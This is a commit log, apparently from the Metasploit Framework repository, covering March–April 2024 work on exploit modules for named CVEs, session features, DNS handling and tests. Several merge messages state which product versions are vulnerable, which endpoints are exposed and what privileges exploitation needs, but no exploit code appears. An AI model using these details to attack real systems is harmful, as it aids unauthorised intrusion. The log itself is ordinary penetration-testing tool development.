adfoster-r7 44a02bcffe Fix crash in exim4_deliver_message_priv_esc 2024-04-15 11:47:06 +01:00
fanqiaojun 6b2bdc893b chore: remove repetitive words
Signed-off-by: fanqiaojun <fanqiaojun@yeah.net>
2024-04-15 11:06:50 +08:00
h00die bc9fdb3d00 docs 2024-04-14 19:51:23 -04:00
Noam Rathaus 9996dcdb1e Expose the default_options struct so that it can be sent via RPC and allow better integration (mainly related to default PAYLOAD selection) 2024-04-14 19:49:28 +03:00
Imran E. Dawoodjee 27e46fe8b1 Really make RuboCop happy 2024-04-13 18:29:27 +08:00
Imran E. Dawoodjee c8b9b321a9 Fix linting 2024-04-13 18:22:20 +08:00
Imran E. Dawoodjee 50a303a6e5 Update references and documentation 2024-04-13 18:21:05 +08:00
Imran E. Dawoodjee 6268235cd3 Add CVE-2022-1373 and CVE-2022-2334 exploit chain 2024-04-13 18:10:45 +08:00
Metasploit 2cf8ea39f9 automatic module_metadata_base.json update 2024-04-12 14:40:38 -05:00
Jack Heysel 1174344b76 Land #18918, Add CrushFTP Module CVE-2023-43177
This exploit module leverages an Improperly Controlled Modification of
Dynamically-Determined Object Attributes vulnerability (CVE-2023-43177)
to achieve unauthenticated remote code execution. This affects CrushFTP
versions prior to 10.5.1.
2024-04-12 12:26:16 -07:00
Jack Heysel dae9657433 FortiClient EMS Exploit Module 2024-04-12 10:00:07 -07:00
Spencer McIntyre 80a8ffd654 Bump ruby_smb to include changes from #264 2024-04-12 10:54:54 -04:00
Metasploit 9f22d67210 automatic module_metadata_base.json update 2024-04-12 08:48:42 -05:00
Christophe De La Fuente d36e22fdc6 Land #18936, mongodb ops manager diagnostic archive info disclosure (cve-2023-0342) 2024-04-12 15:22:18 +02:00
Noam Rathaus b7e0e83d04 Use yields rather than build an array and sort 2024-04-12 08:05:55 +03:00
Noam Rathaus c239db573a Revert "PASSWORD_SPRAY handling"
This reverts commit 9b1978c0b6.
2024-04-12 07:42:55 +03:00
Noam Rathaus ec19414fef Pass the PASSWORD_SPRAY value 2024-04-12 07:42:28 +03:00
Imran E. Dawoodjee 4026141809 Change how #get_auth_token returns 2024-04-12 07:14:34 +08:00
Chocapikk 5870ebc6cf Add suggested changes 2024-04-11 22:48:08 +02:00
Valentin Lobstein deaf3d7649 Update modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2024-04-11 22:15:37 +02:00
Valentin Lobstein 0ba0cd6cfa Update modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2024-04-11 22:15:01 +02:00
Valentin Lobstein 060e5b1d8b Update modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2024-04-11 22:14:51 +02:00
Valentin Lobstein 8ec8afbc45 Update modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2024-04-11 22:14:44 +02:00
Noam Rathaus 5625493b4e PASSWORD_SPRAY passing to credentials 2024-04-11 17:56:24 +03:00
Noam Rathaus 9b1978c0b6 PASSWORD_SPRAY handling 2024-04-11 17:56:12 +03:00
Dean Welch 463200cfb3 Add ldap acceptance tests 2024-04-11 14:40:19 +01:00
Metasploit 2a176e5e15 Bump version of framework to 6.4.4 2024-04-11 03:39:05 -05:00
Metasploit 0df68e8199 automatic module_metadata_base.json update 2024-04-10 11:08:23 -05:00
Spencer McIntyre aa739cd92d Land #18962, rancher audit logs information leak
new post module: rancher audit logs sensitive information leak (CVE-2023-22649)
2024-04-10 11:51:54 -04:00
Spencer McIntyre f579ec7a1a Clean table printing, document tested version 2024-04-10 11:31:55 -04:00
sjanusz-r7 c576db98b5 Populate SMB shares if they're empty 2024-04-10 14:21:13 +01:00
Metasploit f8331f4201 automatic module_metadata_base.json update 2024-04-10 06:55:53 -05:00
Spencer McIntyre 76145c3091 Land #19064, SNMP TCP support 2024-04-10 07:38:35 -04:00
cgranleese-r7 53efed1606 Land #19022, Add MySQL Arch & Platform detection by query 2024-04-10 12:24:08 +01:00
adfoster-r7 2346bfe1ee Land #19065, remove db_create mention 2024-04-09 22:30:47 +01:00
Chocapikk 162fc91193 Add CVE-2024-31819 2024-04-09 22:09:10 +02:00
Metasploit 894d057715 automatic module_metadata_base.json update 2024-04-09 14:40:06 -05:00
Zach Goldman b8176e13a6 Land #19069, Update create session default values 2024-04-09 15:24:02 -04:00
Dean Welch c0c2bf3771 Add ldap acceptance tests 2024-04-09 18:05:40 +01:00
Metasploit 0b610e4255 automatic module_metadata_base.json update 2024-04-09 09:30:32 -05:00
Spencer McIntyre 8f5052f2e7 Land #19051, Add the Shadow Credentials module 2024-04-09 10:13:08 -04:00
sjanusz-r7 a862b16286 Add MySQL Arch & Platform detection by query 2024-04-09 13:38:07 +01:00
adfoster-r7 8a2b092321 Update create session default values 2024-04-09 12:41:27 +01:00
Imran E. Dawoodjee 1129e443c2 Modularise the Softing login lib file 2024-04-09 16:02:46 +08:00
Noam Rathaus 71538a871f 1. Adjust if end if end to if else end
2. Use ::Rex::Socket create's Proto
2024-04-09 08:39:45 +03:00
Ashley Donaldson 29c6e0a1e5 Removed unused function 2024-04-09 07:53:26 +10:00
Spencer McIntyre 397781f2b1 Land #19059, Fix banner issue in psnuffle 2024-04-08 12:03:06 -04:00
Javier Álvarez 2d819cb029 remove db_create mention 2024-04-08 16:53:17 +02:00
Noam Rathaus bf489f0b0d Allow selection of "TCP" for SNMP packets 2024-04-08 17:41:59 +03:00
Noam Rathaus 01d31612c6 Add support for TCP 2024-04-08 17:41:46 +03:00
Metasploit 9982a46538 automatic module_metadata_base.json update 2024-04-08 06:12:17 -05:00
cgranleese-r7 951da5b00c Land #19056, Don't close sockets that we're using for sessions 2024-04-08 11:51:31 +01:00
Ashley Donaldson 4557de9a72 Changes from code review 2024-04-08 11:47:09 +10:00
Ashley Donaldson b1d0918074 Add documentation for module and functions 2024-04-08 11:32:53 +10:00
Ashley Donaldson 1ce29ae21e Make OpenSSL unit test work on all versions 2024-04-08 11:32:53 +10:00
Ashley Donaldson 5852fcbb78 Error handling and unit tests 2024-04-08 11:32:53 +10:00
Ashley Donaldson 9f5444680f Some error handling 2024-04-08 11:32:52 +10:00
Ashley Donaldson 049c3ebd1d Promote constants to top of file 2024-04-08 11:32:52 +10:00
Ashley Donaldson 209d9dfab0 Help user when they've made a typical mistake 2024-04-08 11:32:52 +10:00
Ashley Donaldson 816d834f83 Add dn-binary unit tests 2024-04-08 11:32:51 +10:00
Ashley Donaldson 1b92d3b110 Working writing of certs over ldap 2024-04-08 11:32:51 +10:00
Ashley Donaldson b6acf708f3 Alias get_ticket to pkinit, since many people will search for that 2024-04-08 11:32:50 +10:00
Ashley Donaldson c55f8f20a8 Add shadow credentials module 2024-04-08 11:32:50 +10:00
Ashley Donaldson 8800a74b27 Wrap credential struct with nicer API 2024-04-08 11:32:50 +10:00
Ashley Donaldson e803be425f Initial work on shadow credentials 2024-04-08 11:32:49 +10:00
h00die ee891eca3a spacing 2024-04-07 09:15:50 -04:00
h00die ed1ae32532 sync engine requirements on vsix 2024-04-07 09:13:59 -04:00
h00die b83a91a468 review for mongodb ops manager 2024-04-07 05:39:51 -04:00
Noam Rathaus 705cfb5016 Fix empty banner (never set) issue 2024-04-05 19:24:19 +03:00
Metasploit e184f5e708 automatic module_metadata_base.json update 2024-04-05 09:39:59 -05:00
Christophe De La Fuente 34f0afa298 Land #19044, Gibbon Online School Platform Authenticated RCE [CVE-2024-24725] 2024-04-05 16:20:11 +02:00
Metasploit a0d72680e0 automatic module_metadata_base.json update 2024-04-05 08:42:50 -05:00
Dean Welch 87b84b00fb Don't close sockets that we're using for sessions 2024-04-05 14:33:30 +01:00
adfoster-r7 674249687f Land #19020, consolidate session tests 2024-04-05 14:17:40 +01:00
Dean Welch 434e85261b Add postgres client specs 2024-04-05 13:10:15 +01:00
Dean Welch 25a65c0ed7 Consolidate and simplify session tests 2024-04-05 13:10:15 +01:00
adfoster-r7 a3bba29fb6 Land #19045, add initial mssql module acceptance tests 2024-04-05 13:01:41 +01:00
adfoster-r7 9e670d2f52 Land #19052, Update user agent strings for April 24 2024-04-04 23:43:10 +01:00
Jack Heysel 8968222cf0 Rubocop, when will I learn 2024-04-04 13:41:08 -07:00
Jack Heysel 7f62dd2143 Responded to comments 2024-04-04 13:39:22 -07:00
Zach Goldman 61f9e36443 add mssql acceptance tests 2024-04-04 12:58:43 -05:00
h00die-gr3y 978fb46e52 added documentation 2024-04-04 17:35:12 +00:00
h00die-gr3y 8afbbc1553 third release module based on smcintyre-r7 comments 2024-04-04 17:14:32 +00:00
Metasploit a6ffb5fae8 Bump version of framework to 6.4.3 2024-04-04 03:35:15 -05:00
Ashley Donaldson da5d8f3471 Update user agent strings for April 24 2024-04-04 14:29:14 +11:00
Jack Heysel 9a88ca33e0 second commit with a couple TODOs 2024-04-03 19:36:39 -07:00
Jack Heysel b55c5f45c0 Initial commit 2024-04-03 17:25:45 -07:00
Jack Heysel 531e7baa02 Add reminder todo 2024-04-03 17:08:09 -07:00
Metasploit 47d8ba5c20 automatic module_metadata_base.json update 2024-04-03 08:44:02 -05:00
adfoster-r7 926e2fa204 Land #19033, lint modules/exploits/linux/smtp/haraka.py 2024-04-03 14:19:18 +01:00
adfoster-r7 bd99cfd701 Land #19003, add Zig formatting support to msfvenom and payload generation 2024-04-02 23:17:45 +01:00
Jack Heysel 059cfd9a48 Reduced conf folder txt files 2024-04-02 11:40:00 -07:00
Jack Heysel 03fced404a Apache Solr Backup Restore RCE
Writing file to disk working

working on linux

wip authentcaiton

Consolodated conf folders into one

Renamed conf1 to conf in msf data dir

Randomize the configuration name

Docs plus finishing touches

rubocop

Updated exploit file location

Removed unused external dir

Reduced conf folder
2024-04-02 11:33:52 -07:00
h00die-gr3y 8aa6d19e7d second release module 2024-04-01 20:21:37 +00:00
Metasploit 6a32f81210 automatic module_metadata_base.json update 2024-04-01 10:47:03 -05:00
Spencer McIntyre 3af68ef51a Land #19032, Fix bad module indentation
The wp_downloadmanager_upload module has bad indentation
2024-04-01 11:30:59 -04:00
Metasploit 44ba1b5082 automatic module_metadata_base.json update 2024-04-01 10:07:32 -05:00
Spencer McIntyre 7e132758d6 Land #19031, Extra ',' is causing ruby issues 2024-04-01 10:52:14 -04:00
h00die-gr3y d8942b27a2 first release module 2024-04-01 14:49:10 +00:00
Metasploit 33ca728e38 automatic module_metadata_base.json update 2024-04-01 09:48:16 -05:00
Spencer McIntyre e34f936862 Land #19030, Module indentation was wrong 2024-04-01 10:27:12 -04:00
Noam Rathaus 9cc294dbaf 1. Remove unused modules
2. Prettify code
2024-03-30 17:56:49 +03:00
Noam Rathaus c8c7e74cba Bad indentation 2024-03-30 17:06:25 +03:00
Noam Rathaus 609d356083 Extra ',' is causing ruby issues 2024-03-30 17:02:13 +03:00
Noam Rathaus e75043f00e Module indentation was wrong 2024-03-30 16:50:48 +03:00
Metasploit 4ecd106681 automatic module_metadata_base.json update 2024-03-29 15:46:34 -05:00
bwatters 3dc638909f Land #18906, Add template data files for ESC2 and ESC3
Merge branch 'land-18906' into upstream-master
2024-03-29 15:29:52 -05:00
Spencer McIntyre 43d1bd9a2e Add docs and fix CSRF token for v7.0 2024-03-29 14:05:39 -04:00
Spencer McIntyre c7976d204c Add module metadata and clean things up 2024-03-29 10:40:43 -04:00
Spencer McIntyre e5635c4bfd Add source code for Python deserialization gadgets 2024-03-29 09:33:47 -04:00
Spencer McIntyre fb073cf21a Bump ruby_smb to pull in submitted changes 2024-03-29 09:33:47 -04:00
Spencer McIntyre 2292da9164 Add the UNC loading technique too 2024-03-29 09:33:47 -04:00
Spencer McIntyre 9dcd0e461f Delete the file using the file manager too 2024-03-29 09:33:47 -04:00
Spencer McIntyre 8fa7aa6407 Initial exploit for CVE-2024-2044 2024-03-29 09:33:44 -04:00
Christophe De La Fuente e6e13e7b45 Fixes from code review 2024-03-29 12:18:16 +01:00
ArchiMoebius 28ad74c663 chore(bump): rex-text 2024-03-28 23:53:59 +00:00
Metasploit 876398da31 automatic module_metadata_base.json update 2024-03-28 15:47:57 -05:00
Jack Heysel 31cf0e2633 Land #18764, Add unauth Jenkins file read module
This PR adds a new module to exploit CVE-2024-23897, an unauth arbitrary
(first 2 lines) file read on Jenkins.
2024-03-28 13:29:39 -07:00
jheysel-r7 155181fd92 Apply suggestions to fix the last code review 2024-03-28 15:54:58 -04:00
jheysel-r7 14938a2d77 Apply suggestions from code review 2024-03-28 14:41:25 -04:00
Jack Heysel 0cd2bc5010 Land #18935, Fix LDAP auto auth
This PR fixes a common user mistake when authenticating with LDAP
modules. Now users can specify either the USERNAME (user) and DOMAIN
(domain.local) datastore options or the original format of just the
USERNAME in the UPN format (user@domain.local). This updates the LDAP
library.
2024-03-28 11:19:55 -07:00
h00die-gr3y 9f50f12e6e update addressing cdelafuente-r7 comments 2024-03-28 18:16:11 +00:00
Metasploit 0e273bfc76 automatic module_metadata_base.json update 2024-03-28 12:56:24 -05:00
adfoster-r7 20af1a4259 Land #19007, don't run check modules in the background 2024-03-28 17:35:23 +00:00
Jack Heysel d7f3fd8cc0 Land #18915, Add Watchguard RCE CVE-2022-26318
This PR adds a module for a buffer overflow at the administration
interface of WatchGuard Firebox and XTM appliances. The appliances are
built from a cherrypy python backend sending XML-RPC requests to a C
binary called wgagent using pre-authentication endpoint /agent/login.
This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before
12.1.3_U8, and 12.2.x through 12.5.x before 12.5.9_U2. Successful
exploitation results in remote code execution as user nobody.
2024-03-28 10:24:32 -07:00
adfoster-r7 0580068570 Land #19014, add MySQL session type acceptance tests 2024-03-28 17:07:58 +00:00
adfoster-r7 c0d66fd3a9 Land #18933, update SQL sessions to correctly manage history 2024-03-28 17:02:05 +00:00
Metasploit 37d3c88731 automatic module_metadata_base.json update 2024-03-28 11:58:32 -05:00
cgranleese-r7 f9b20d89f3 Add MySQL session type acceptance tests 2024-03-28 16:39:27 +00:00
adfoster-r7 d6ecd9db70 Land #19021, update admin/mysql/mysql_enum for newer versions of mysql 2024-03-28 16:34:49 +00:00
Metasploit 8d3bfc05ef Bump version of framework to 6.4.2 2024-03-28 07:29:54 -05:00
adfoster-r7 69660c329d Land #19017, add better logging for failed mssql logins 2024-03-28 12:21:28 +00:00
adfoster-r7 00b9ae32f3 Land #19016, add support for guid column type in mssql and improve error logging 2024-03-28 12:18:58 +00:00
cgranleese-r7 c5e98d954b Updates to work with newer versions of MySQL 2024-03-28 12:11:35 +00:00
adfoster-r7 c79540a93a Land #18982, Add RPC methods for interactive session read and write 2024-03-28 11:32:03 +00:00
Egor Kalinichev 623307a119 Implement new interactive_read and interactive_write RPC calls for Session API to extend support of meterpreter-style session interaction via RPC to new session types. 2024-03-28 11:42:04 +01:00
h00die-gr3y 6e6f1beb92 update addressing jheysel-r7 comments 2024-03-28 08:43:08 +00:00
Zach Goldman b5d96de192 add better logging for failed logins 2024-03-27 09:54:38 -05:00
Zach Goldman 9af16b2439 add support for guid column type in mssql 2024-03-27 09:50:06 -05:00
dwelch-r7 47fc61f65d Land #19015, Allow static DNS hostnames ending in a . to be queried 2024-03-27 13:49:49 +00:00
ekalinichev-r7 c4995100bf Land #18925: Update RPC API to include Auxiliary and Exploit modules in session.compatible_modules response 2024-03-27 11:46:53 +01:00
Metasploit 86544049bb automatic module_metadata_base.json update 2024-03-26 17:02:59 -05:00
Jack Heysel abb2eb7ffd Land #18891, Add RCE module for wp bricks builder
This PR adds the wp_bricks_builder_rce exploit module that targets a
known vulnerability in the WordPress Bricks Builder Theme, versions
prior to 1.9.6.
2024-03-26 14:46:35 -07:00
Balgogan b9b4a624d9 Fix typos 2024-03-26 21:05:35 +01:00
Valentin Lobstein abc39e86f9 Update modules/exploits/multi/http/wp_bricks_builder_rce.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2024-03-26 20:40:04 +01:00
Valentin Lobstein 672036f53a Update modules/exploits/multi/http/wp_bricks_builder_rce.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2024-03-26 20:39:33 +01:00
Valentin Lobstein 8a1290c8a6 Update modules/exploits/multi/http/wp_bricks_builder_rce.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2024-03-26 20:39:23 +01:00
Valentin Lobstein 85e27b0bc3 Update modules/exploits/multi/http/wp_bricks_builder_rce.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2024-03-26 20:39:04 +01:00
h00die-gr3y 4546fd1600 small updates documentation 2024-03-26 19:34:12 +00:00
Metasploit 7b172f3675 automatic module_metadata_base.json update 2024-03-26 13:07:11 -05:00
bwatters e58c6b9df2 Land #18721, SharePoint Unauth RCE Exploit Chain (CVE-2023-29357 & CVE-2023-24955)
Merge branch 'land-18721' into upstream-master
2024-03-26 12:42:22 -05:00
Spencer McIntyre 8bb690fa01 Remove any trailing dots from static names
This allows them to be queried
2024-03-26 08:40:24 -04:00
adfoster-r7 5a77f76ec9 Land #19006, Fixes WMAP plugin loading failures 2024-03-26 11:28:49 +00:00
sjanusz-r7 e2814d6ad5 Align history manager to IRBs multiple backend library approach 2024-03-26 11:16:37 +00:00
sjanusz-r7 70e27f8112 Passing history manager tests 2024-03-26 10:06:50 +00:00
sjanusz-r7 873d3500ff SQL sessions have correct history manager support 2024-03-26 10:06:50 +00:00
sjanusz-r7 abb861c80a Add interactive query log files 2024-03-26 10:06:50 +00:00
adfoster-r7 30093ea0ae Land #19012, Fix/dns/dot suffixed names 2024-03-25 21:47:40 +00:00
Metasploit 919e6d4651 automatic module_metadata_base.json update 2024-03-25 15:41:44 -05:00
bwatters e775c7c20a Land #18967, Artica Proxy unauthenticated RCE [CVE-2024-2054]
Merge branch 'land-18967' into upstream-master
2024-03-25 15:25:27 -05:00
Spencer McIntyre 6d1d20cdbe Bump rex-socket to include changes from #66 2024-03-25 14:46:14 -04:00
Spencer McIntyre 4c835545a3 Ignore the hosts file if it can't be loaded 2024-03-25 14:44:49 -04:00
Metasploit 7a3d031b15 automatic module_metadata_base.json update 2024-03-25 12:46:41 -05:00
adfoster-r7 c03e4c4ab0 Land #19009, add missing Platform to osx/local/persistence module 2024-03-25 17:31:15 +00:00
sjanusz-r7 38c5c6bb11 Add missing Platform to osx/local/persistence module 2024-03-25 16:00:25 +00:00
sjanusz-r7 88585bab40 Suggest all compatible modules for session in RPC 2024-03-25 15:55:23 +00:00
Dean Welch f132bdbe30 Enforce single module stance 2024-03-25 11:53:23 +00:00
Metasploit 0e3e7b594e automatic module_metadata_base.json update 2024-03-25 06:44:56 -05:00
Christophe De La Fuente 57a45a0b55 CrushFTP exploit module CVE-2023-43177 and documentation 2024-03-25 12:41:24 +01:00
cgranleese-r7 9b4114eda0 Land #18961, Adds session documentation 2024-03-25 11:23:05 +00:00
adfoster-r7 decba4350e Additional changes to documentation 2024-03-25 10:53:08 +00:00
cgranleese-r7 d3251043e5 Fixes WMAP plugin loading failures 2024-03-25 09:55:38 +00:00
h00die-gr3y d240d17113 added documentation 2024-03-24 10:30:36 +00:00
h00die-gr3y 0262efee8b first release module 2024-03-24 09:32:56 +00:00
ArchiMoebius 533780bde9 feat(ziglang): add buffer/comment support 2024-03-23 14:53:54 +00:00
h00die 3da170a43c smcintyre-r7 recommendation for better payload handling 2024-03-22 17:04:06 -04:00
h00die 4f6903481c remove screenshot functionality for time being 2024-03-22 16:37:22 -04:00
h00die f6b65993ac ipynb vscode exploit 2024-03-22 16:26:03 -04:00
h00die eb26b0adcc gitlens exploit module 2024-03-22 16:22:39 -04:00
h00die 83944f7070 vsix deployment module 2024-03-22 16:14:51 -04:00
Metasploit 685a2e9df6 automatic module_metadata_base.json update 2024-03-22 12:49:46 -05:00
dwelch-r7 a674310c22 Land #18992, Fix postgres version logging 2024-03-22 17:33:43 +00:00
adfoster-r7 acf9745200 Fix postgres version logging 2024-03-22 16:50:01 +00:00
h00die 0cd174c533 rancher docs update 2024-03-21 17:40:19 -04:00
h00die f9de96cc95 mongodb ops manager diagnostic archive info disclosure 2024-03-21 17:36:15 -04:00
h00die f617ea6e96 Update modules/auxiliary/gather/mongodb_ops_manager_diagnostic_archive_info.rb
Co-authored-by: Brendan <bwatters@rapid7.com>
2024-03-21 16:39:49 -04:00
h00die-gr3y f217312ad1 module and documentation updates based on review comments (bwatters-r7/cgranleese-r7) 2024-03-21 16:13:55 +00:00
Zach Goldman 2c307f1bb3 Adds session documentation
add more console output, add to pentesting side

split out session, help, query, query_interactive sections

add multiline examples

update mysql, smb
2024-03-21 09:52:10 -05:00
Metasploit 11c24ecdda automatic module_metadata_base.json update 2024-03-21 08:20:16 -05:00
dwelch-r7 3de8b02287 Land #18985, Fixes store_valid_credential conditional logic 2024-03-21 12:56:23 +00:00
cgranleese-r7 d750ea19eb Fixes store_valid_credential conditional logic for unix/webapp/wp_admin_shell_upload module 2024-03-21 12:22:11 +00:00
Metasploit 3af4358281 Bump version of framework to 6.4.1 2024-03-21 03:37:19 -05:00
adfoster-r7 b461f08ba3 Land #18980, improves basic shell help command 2024-03-20 21:27:12 +00:00
Metasploit a0d162bc9f automatic module_metadata_base.json update 2024-03-20 15:10:21 -05:00
Jack Heysel 2b90d33aef Land #18618, Add OpenNMS privesc and auth RCE
This module exploits built-in functionality in OpenNMS Horizon in order
to execute arbitrary commands as the opennms user. For versions 32.0.2
and higher, this module requires valid credentials for a user with
ROLE_FILESYSTEM_EDITOR privileges and either ROLE_ADMIN or ROLE_REST.
For versions 32.0.1 and lower, credentials are required for a user with
ROLE_FILESYSTEM_EDITOR, ROLE_REST, and/or ROLE_ADMIN privileges.
2024-03-20 12:54:16 -07:00
Zach Goldman c16b8e6e64 adds help command to basic shells 2024-03-20 14:18:36 -05:00
adfoster-r7 fd8354340b Land #18973, improves the help menu for sessions 2024-03-20 19:11:18 +00:00
adfoster-r7 298e03b1cd Land #18885, update the sessions command to be consistent 2024-03-20 18:49:33 +00:00
Jack Heysel 6cd7f44197 rubocop 2024-03-20 11:39:19 -07:00
Jack Heysel 149dc15b21 Add check to see if notifications are enabled 2024-03-20 11:33:15 -07:00
Zach Goldman 2c9ade955e make session query/shares help menu more explicit 2024-03-20 13:18:10 -05:00
Metasploit 1f1e6b2dbb automatic module_metadata_base.json update 2024-03-20 12:55:38 -05:00
Spencer McIntyre 321e0730e0 Land #18957, Bump Metasploit version to 6.4.0 2024-03-20 13:24:44 -04:00
Zach Goldman 1216bf1904 Land #18979, Remove empty () when no DB selected for sql session prompts 2024-03-20 12:52:02 -04:00
cgranleese-r7 2a63d0d1f0 Land #18978, Add user affordance for scanner modules that can create a new session 2024-03-20 16:50:29 +00:00
Dean Welch ff5811e96b Remove empty () when no DB selected for sql session prompts 2024-03-20 16:13:48 +00:00
adfoster-r7 d4cb976aa7 Land #18960, improves handling of dying SMB and SQL sessions 2024-03-20 16:06:04 +00:00
Dean Welch 7e3048d2f7 Grammar 2024-03-20 15:45:07 +00:00
adfoster-r7 0399768f39 Land #18974, Consistently refer to black hole as two words 2024-03-20 15:42:26 +00:00
Dean Welch 686acb4c7b Correctly format CreateSession option in output 2024-03-20 15:06:20 +00:00
Spencer McIntyre b363f6f87d Alias blackhole to black-hole in the UI 2024-03-20 10:57:04 -04:00
cgranleese-r7 961a072de4 Improves handling of dying SMB and SQL sessions 2024-03-20 14:16:01 +00:00
adfoster-r7 c9fe98b522 Bump Metasploit version to 6.4.0 2024-03-20 13:46:08 +00:00
Dean Welch 4946fc297f Add user affordance for scanner modules that can create a new session 2024-03-20 12:14:49 +00:00
Spencer McIntyre 2b3a723557 Consistently refer to black hole as two words 2024-03-19 20:49:28 -04:00
Jack Heysel d03dfe8991 Land #18841, Update sap_icm_paths.txt wordlist
This PR updates the sap_icm_paths.txt wordlist with the newest enteries.
2024-03-19 16:40:09 -07:00
DaveYesland 1a8233dfe7 msftidy cleanup 2024-03-19 14:52:28 -07:00
DaveYesland e32d05eab8 Add module and docs for CVE-2024-1212 2024-03-19 11:37:12 -07:00
bwatters 1e47b33857 Land #18971, Adjust multiple DNS related things
Merge branch 'land-18971' into upstream-master
2024-03-19 12:34:51 -05:00
Metasploit 7f761d074d automatic module_metadata_base.json update 2024-03-19 11:56:36 -05:00
Spencer McIntyre b3b6f79594 Update the presentation of static entries
Keep the first line blank for consistency with rules and sort hostnames
and addresses.
2024-03-19 12:48:13 -04:00
Spencer McIntyre 0cf4737317 Add specs for resolver spell checking 2024-03-19 12:48:13 -04:00
Spencer McIntyre 5b1d0100d2 Add spell checking for resolvers 2024-03-19 12:48:07 -04:00
Spencer McIntyre 0f9986c787 Land #18947, Fix inconsistent casing
Fix inconsistent casing in windows/local/wmi_persistence
2024-03-19 12:40:34 -04:00
cgranleese-r7 ca97d5d9eb Land #18965, Remove stale documentation link 2024-03-19 16:06:55 +00:00
adfoster-r7 ff775b7b23 Remove stale documentation link 2024-03-19 13:46:35 +00:00
Spencer McIntyre e8b99343a6 Add static entries examples and fix black hole 2024-03-19 09:13:21 -04:00
Metasploit 7c7fa36685 automatic module_metadata_base.json update 2024-03-18 15:56:27 -05:00
Jack Heysel bf0d81db03 Land #18838, Improve Runc Priv Esc Check
This PR adds support for Debian and number of fixes and improvements for
the runc_cwd_priv_esc. Proir to this fix the module would report
vulnerable for a number of versions that the patch had been back ported
to.
2024-03-18 13:31:09 -07:00
h00die-gr3y e84fe947c2 third release module and documentation updates 2024-03-15 23:33:29 +00:00
h00die-gr3y 5dd75e174b second release module and documentation 2024-03-15 18:27:59 +00:00
h00die-gr3y df0012a63f initial release module 2024-03-15 16:10:05 +00:00
Gaurav Jain 287b07281d Use Rex Parser to parse options for sessions command 2024-03-15 18:50:19 +05:30
Gaurav Jain 02713fcadb Update tests for sessions command 2024-03-15 01:26:18 +05:30
adfoster-r7 15c56a870e Land #18895, Add upload/download/delete/mkdir/rmdir to smb session 2024-03-14 10:51:48 +00:00
Metasploit 7cabfd7855 Bump version of framework to 6.3.61 2024-03-14 03:35:21 -05:00
Metasploit d2c19efeac automatic module_metadata_base.json update 2024-03-13 19:28:29 -05:00
adfoster-r7 55dd5aa9c0 Land #18899, update ysoserial viewstate tool 2024-03-14 00:12:38 +00:00
h00die 251aa021e1 rancher audit logs module 2024-03-13 16:42:51 -04:00
Christophe De La Fuente 44c5422e07 Land #18922, JetBrains TeamCity Unauthenticated RCE exploit module (CVE-2024-27198) 2024-03-13 20:16:27 +01:00
cgranleese-r7 d2c599eaf4 Land #18954, Ensure modules honor spooler settings 2024-03-13 16:48:30 +00:00
sfewer-r7 6d84f0e898 reduce the size of teh exploit method by spinngin out two new methods create_payload_plugin and auth_new_admin_user. several if/unless blocks were flattened to be inline if/unless 2024-03-13 09:58:51 +00:00
sfewer-r7 4bd105202a improve the readability of the XML 2024-03-13 09:29:43 +00:00
sfewer-r7 b04e84ed99 clarify we must call this a second time 2024-03-13 09:17:18 +00:00
sfewer-r7 df2c94f873 anther typo 2024-03-13 09:14:23 +00:00
Stephen Fewer b9e82375c1 typo
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2024-03-13 09:13:11 +00:00
Stephen Fewer d7bf7bc2ea Use Failure::NoAccess as a better failure error, as we are trying to login
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2024-03-13 09:12:56 +00:00
Stephen Fewer 46dd21d69d use ||= to assign new hash if needed
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2024-03-13 09:11:42 +00:00
h00die 6a3b918be2 rancher cve from 2021 2024-03-12 16:24:38 -04:00
Christophe De La Fuente fbbaf69050 Land #18949, notify the user the DNS feature requires a restart 2024-03-12 20:15:15 +01:00
Christophe De La Fuente 8989b3226f Update the wording for the DNS feature warning restart message 2024-03-12 20:14:22 +01:00
adfoster-r7 4292488925 Ensure modules honor spooler settings 2024-03-12 18:01:23 +00:00
Metasploit 923f4c9f7b automatic module_metadata_base.json update 2024-03-12 11:45:17 -05:00
adfoster-r7 81e96d3e71 Land #18952, Updates Postgres hashdump module to now work with newer versions of Postgres 2024-03-12 16:29:01 +00:00
cgranleese-r7 1baf86842e Land #18951, Update acceptance test readme 2024-03-12 16:26:08 +00:00
dwelch-r7 d88185bff0 Land #18945, Fix crash when running http crawler with database connected 2024-03-12 16:13:44 +00:00
cgranleese-r7 a33e7a72b0 Updates Postgres hashdump module to now work with newer versions of Postgres 2024-03-12 16:13:04 +00:00
adfoster-r7 9a9c27bb60 Fix crash when running http crawler with database connected 2024-03-12 15:47:32 +00:00
adfoster-r7 290656faaf Update acceptance test readme 2024-03-12 15:25:23 +00:00
Metasploit b52d79ec49 automatic module_metadata_base.json update 2024-03-12 09:27:23 -05:00
cgranleese-r7 4e0e3da74c Land #18835, clean up code duplication 2024-03-12 14:09:22 +00:00
Spencer McIntyre a366f6a819 The DNS feature requires a restart, so flag it
Also rename DNS_FEATURE to simply DNS because in this context, the
FEATURE suffix is redundant.
2024-03-12 09:58:52 -04:00
Christophe De La Fuente f4fedc2195 Land #18868, Add documentation for the new DNS command 2024-03-12 14:08:08 +01:00
Spencer McIntyre c8d50bda0f Add documentation for the new DNS command 2024-03-12 08:59:08 -04:00
Dean Welch 689caf4bd1 Add upload/download/delete/mkdir/rmdir to smb session 2024-03-12 11:56:29 +00:00
Christophe De La Fuente 69f368b8f4 Land #18944, Fix saving and loading DNS rules from the config 2024-03-12 12:10:58 +01:00
